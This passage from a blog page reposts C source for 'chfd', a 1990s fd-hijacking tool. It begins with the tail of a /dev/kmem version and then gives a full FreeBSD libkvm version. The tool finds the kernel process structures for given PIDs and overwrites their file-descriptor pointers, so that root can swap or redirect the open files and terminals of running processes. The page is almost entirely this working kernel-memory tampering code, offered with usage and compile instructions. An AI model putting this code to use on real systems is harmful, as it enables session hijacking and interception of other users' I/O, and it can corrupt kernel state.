    pid3 <span style=color:#f92672>=</span> getpid(), fd3 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);

  kfd <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/kmem&#34;</span>, O_RDWR);
  <span style=color:#66d9ef>if</span> (kfd <span style=color:#f92672>&lt;</span> <span style=color:#ae81ff>0</span>)
    perror(<span style=color:#e6db74>&#34;open&#34;</span>), exit(<span style=color:#ae81ff>1</span>);

  findtask(pid1);
  ad1 <span style=color:#f92672>=</span> AD(fd1);
  val1 <span style=color:#f92672>=</span> readvalz(ad1);
  printf(<span style=color:#e6db74>&#34;Found fd pointer 1, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val1, ad1);

  findtask(pid2);
  ad2 <span style=color:#f92672>=</span> AD(fd2);
  val2 <span style=color:#f92672>=</span> readvalz(ad2);
  printf(<span style=color:#e6db74>&#34;Found fd pointer 2, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val2, ad2);

  <span style=color:#66d9ef>if</span> (three) {
    findtask(pid3);
    ad3 <span style=color:#f92672>=</span> AD(fd3);
    val3 <span style=color:#f92672>=</span> readvalz(ad3);
    printf(<span style=color:#e6db74>&#34;Found fd pointer 3, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val3, ad3);
  }

  <span style=color:#66d9ef>if</span> (three) {
    <span style=color:#66d9ef>if</span> (readval(ad1)<span style=color:#f92672>!=</span>val1 <span style=color:#f92672>||</span> readval(ad2)<span style=color:#f92672>!=</span>val2 <span style=color:#f92672>||</span> readval(ad3)<span style=color:#f92672>!=</span>val3) {
      fprintf(stderr, <span style=color:#e6db74>&#34;fds changed in memory while using them - try again</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
      exit(<span style=color:#ae81ff>1</span>);
    }
    writeval(ad2, val1);
    writeval(ad3, val2);
    writeval(ad1, val3);
  } <span style=color:#66d9ef>else</span> {
    <span style=color:#66d9ef>if</span> (readval(ad1)<span style=color:#f92672>!=</span>val1 <span style=color:#f92672>||</span> readval(ad2)<span style=color:#f92672>!=</span>val2) {
      fprintf(stderr, <span style=color:#e6db74>&#34;fds changed in memory while using them - try again</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
      exit(<span style=color:#ae81ff>1</span>);
    }
    writeval(ad1, val2);
    writeval(ad2, val1);
  }
  printf(<span style=color:#e6db74>&#34;Done!</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
}
</code></pre></div><h2 id=the-freebsd-code>The FreeBSD Code</h2><div class=highlight><pre style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c>he FreeBSD code
<span style=color:#f92672>----------------</span>

<span style=color:#f92672>&lt;++&gt;</span> fd_hijack<span style=color:#f92672>/</span>chfd<span style=color:#f92672>-</span>freebsd.c

<span style=color:#75715e>/*  chfd - exchange fd&#39;s between 2 or 3 running processes.
</span><span style=color:#75715e> *  
</span><span style=color:#75715e> *  This was written for FreeBSD and is *very* system-specific.  Needs 
</span><span style=color:#75715e> *  read/write access to /dev/mem and /dev/kmem; only root can usually 
</span><span style=color:#75715e> *  do that, and only if the system is running at securelevel -1.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Use: chfd pid1 fd1 pid2 fd2 [pid3 fd3]
</span><span style=color:#75715e> *  Compile with: gcc chfd.c -o chfd -lkvm
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  With two sets of arguments, exchanges a couple of fd between the 
</span><span style=color:#75715e> *  two processes.
</span><span style=color:#75715e> *  With three sets, the second process gets the first&#39;s fd, the third 
</span><span style=color:#75715e> *  gets the second&#39;s fd, and the first gets the third&#39;s fd.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Note that this is inherently unsafe, since we&#39;re messing with kernel
</span><span style=color:#75715e> *  variables while the kernel itself might be changing them.  It works
</span><span style=color:#75715e> *  in practice, but no self-respecting program would want to do this.
</span><span style=color:#75715e> *
</span><span style=color:#75715e> *  Written by: orabidoo &lt;odar@pobox.com&gt;
</span><span style=color:#75715e> *  FreeBSD version: 4 May 97
</span><span style=color:#75715e> */</span>


<span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;stdio.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;fcntl.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;kvm.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;sys/proc.h&gt;</span><span style=color:#75715e>
</span><span style=color:#75715e></span>
<span style=color:#75715e>#define NEXTP ((char *)&amp;p.p_list.le_next - (char *)&amp;p)
</span><span style=color:#75715e>#define FILES ((char *)&amp;p.p_fd - (char *)&amp;p)
</span><span style=color:#75715e>#define AD(fd) (readvalz(readvalz(procp + FILES)) + 4*(fd))
</span><span style=color:#75715e></span>
kvm_t <span style=color:#f92672>*</span>kfd;
<span style=color:#66d9ef>struct</span> proc p;
u_long procp, allproc;
<span style=color:#66d9ef>struct</span> nlist nm[<span style=color:#ae81ff>2</span>];

u_long <span style=color:#a6e22e>readval</span>(u_long ad) {
  u_long val;

  <span style=color:#66d9ef>if</span> (kvm_read(kfd, ad, <span style=color:#f92672>&amp;</span>val, <span style=color:#ae81ff>4</span>) <span style=color:#f92672>!=</span> <span style=color:#ae81ff>4</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;error reading...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>return</span> val;
}

u_long <span style=color:#a6e22e>readvalz</span>(u_long ad) {
  u_long r <span style=color:#f92672>=</span> readval(ad);
  <span style=color:#66d9ef>if</span> (r <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;NULL pointer found (fd not open?)</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  <span style=color:#66d9ef>return</span> r;
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>writeval</span>(u_long ad, u_long val) {
  <span style=color:#66d9ef>if</span> (kvm_write(kfd, ad, <span style=color:#f92672>&amp;</span>val, <span style=color:#ae81ff>4</span>) <span style=color:#f92672>!=</span> <span style=color:#ae81ff>4</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;error writing...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>readproc</span>(u_long ad) {
  <span style=color:#66d9ef>if</span> (kvm_read(kfd, ad, <span style=color:#f92672>&amp;</span>p, <span style=color:#66d9ef>sizeof</span>(<span style=color:#66d9ef>struct</span> proc)) <span style=color:#f92672>!=</span> <span style=color:#66d9ef>sizeof</span>(<span style=color:#66d9ef>struct</span> proc))
    fprintf(stderr, <span style=color:#e6db74>&#34;error reading a struct proc...</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
}

<span style=color:#66d9ef>void</span> <span style=color:#a6e22e>findproc</span>(<span style=color:#66d9ef>int</span> pid) {
  u_long adr;

  <span style=color:#66d9ef>for</span> (adr <span style=color:#f92672>=</span> readval(allproc); adr; adr <span style=color:#f92672>=</span> readval(adr <span style=color:#f92672>+</span> NEXTP)) {
    procp <span style=color:#f92672>=</span> adr;
    readproc(procp);
    <span style=color:#66d9ef>if</span> (p.p_pid <span style=color:#f92672>==</span> pid) <span style=color:#66d9ef>return</span>;
  }
  fprintf(stderr, <span style=color:#e6db74>&#34;Process not found</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
  exit(<span style=color:#ae81ff>1</span>);
}

<span style=color:#66d9ef>int</span> <span style=color:#a6e22e>main</span>(<span style=color:#66d9ef>int</span> argc, <span style=color:#66d9ef>char</span> <span style=color:#f92672>**</span>argv) {
  <span style=color:#66d9ef>int</span> pid1, fd1, pid2, fd2, pid3, fd3;
  u_long ad1, val1, ad2, val2, ad3, val3;
  <span style=color:#66d9ef>int</span> three<span style=color:#f92672>=</span><span style=color:#ae81ff>0</span>;

  <span style=color:#66d9ef>if</span> (argc <span style=color:#f92672>!=</span> <span style=color:#ae81ff>5</span> <span style=color:#f92672>&amp;&amp;</span> argc <span style=color:#f92672>!=</span> <span style=color:#ae81ff>7</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;Use: %s pid1 fd1 pid2 fd2 [pid3 fd3]</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, argv[<span style=color:#ae81ff>0</span>]), 
    exit(<span style=color:#ae81ff>1</span>);

  pid1 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>1</span>]), fd1 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>2</span>]);
  pid2 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>3</span>]), fd2 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>4</span>]);
  <span style=color:#66d9ef>if</span> (argc <span style=color:#f92672>==</span> <span style=color:#ae81ff>7</span>)
    pid3 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>5</span>]), fd3 <span style=color:#f92672>=</span> atoi(argv[<span style=color:#ae81ff>6</span>]), three<span style=color:#f92672>=</span><span style=color:#ae81ff>1</span>;

  <span style=color:#66d9ef>if</span> (pid1 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    pid1 <span style=color:#f92672>=</span> getpid(), fd1 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);
  <span style=color:#66d9ef>if</span> (pid2 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    pid2 <span style=color:#f92672>=</span> getpid(), fd2 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);
  <span style=color:#66d9ef>if</span> (three <span style=color:#f92672>&amp;&amp;</span> pid3 <span style=color:#f92672>==</span> <span style=color:#ae81ff>0</span>)
    pid3 <span style=color:#f92672>=</span> getpid(), fd3 <span style=color:#f92672>=</span> open(<span style=color:#e6db74>&#34;/dev/null&#34;</span>, O_RDWR);

  kfd <span style=color:#f92672>=</span> kvm_open(NULL, NULL, NULL, O_RDWR, <span style=color:#e6db74>&#34;chfd&#34;</span>);
  <span style=color:#66d9ef>if</span> (kfd <span style=color:#f92672>==</span> NULL) exit(<span style=color:#ae81ff>1</span>);

  bzero(nm, <span style=color:#ae81ff>2</span><span style=color:#f92672>*</span><span style=color:#66d9ef>sizeof</span>(<span style=color:#66d9ef>struct</span> nlist));
  nm[<span style=color:#ae81ff>0</span>].n_name <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;_allproc&#34;</span>;
  nm[<span style=color:#ae81ff>1</span>].n_name <span style=color:#f92672>=</span> NULL;
  <span style=color:#66d9ef>if</span> (kvm_nlist(kfd, nm) <span style=color:#f92672>!=</span> <span style=color:#ae81ff>0</span>)
    fprintf(stderr, <span style=color:#e6db74>&#34;Can&#39;t read kernel name list</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>), exit(<span style=color:#ae81ff>1</span>);
  allproc <span style=color:#f92672>=</span> nm[<span style=color:#ae81ff>0</span>].n_value;

  findproc(pid1);
  ad1 <span style=color:#f92672>=</span> AD(fd1);
  val1 <span style=color:#f92672>=</span> readvalz(ad1);
  printf(<span style=color:#e6db74>&#34;Found fd pointer 1, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val1, ad1);

  findproc(pid2);
  ad2 <span style=color:#f92672>=</span> AD(fd2);
  val2 <span style=color:#f92672>=</span> readvalz(ad2);
  printf(<span style=color:#e6db74>&#34;Found fd pointer 2, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val2, ad2);

  <span style=color:#66d9ef>if</span> (three) {
    findproc(pid3);
    ad3 <span style=color:#f92672>=</span> AD(fd3);
    val3 <span style=color:#f92672>=</span> readvalz(ad3);
    printf(<span style=color:#e6db74>&#34;Found fd pointer 3, value %.8x, stored at %.8x</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>, val3, ad3);
  }

  <span style=color:#66d9ef>if</span> (three) {
    <span style=color:#66d9ef>if</span> (readval(ad1)<span style=color:#f92672>!=</span>val1 <span style=color:#f92672>||</span> readval(ad2)<span style=color:#f92672>!=</span>val2 <span style=color:#f92672>||</span> readval(ad3)<span style=color:#f92672>!=</span>val3) {
      fprintf(stderr, <span style=color:#e6db74>&#34;fds changed in memory while using them - try again</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
      exit(<span style=color:#ae81ff>1</span>);
    }
    writeval(ad2, val1);
    writeval(ad3, val2);
    writeval(ad1, val3);
  } <span style=color:#66d9ef>else</span> {
    <span style=color:#66d9ef>if</span> (readval(ad1)<span style=color:#f92672>!=</span>val1 <span style=color:#f92672>||</span> readval(ad2)<span style=color:#f92672>!=</span>val2) {
      fprintf(stderr, <span style=color:#e6db74>&#34;fds changed in memory while using them - try again</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
      exit(<span style=color:#ae81ff>1</span>);
    }
    writeval(ad1, val2);
    writeval(ad2, val1);
  }
  printf(<span style=color:#e6db74>&#34;Done!</span><span style=color:#ae81ff>\n</span><span style=color:#e6db74>&#34;</span>);
}
</code></pre></div><div class=footer></div><h2><a href=about/>Distribution Complete blog</a></h2>Younjin JEONG: <a href="mailto: younjin.jeong@gmail.com">younjin.jeong@gmail.com</a></br>Powered by <a href=https://gohugo.io/>Hugo</a> with
<a href=https://github.com/mrmierzejewski/hugo-theme-console/>Console Theme</a>.</br><a href=https://opensource.org/licenses/LGPL-3.0>Terms and Conditions</a></br></div></div></body></html>